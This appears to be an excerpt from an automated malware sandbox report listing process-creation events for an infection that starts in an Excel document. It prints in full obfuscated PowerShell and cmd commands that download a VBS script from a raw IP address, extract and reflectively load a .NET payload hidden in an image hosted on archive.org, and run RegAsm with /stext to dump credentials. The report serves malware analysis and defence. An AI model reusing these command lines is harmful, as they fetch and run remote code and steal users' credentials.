                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn"
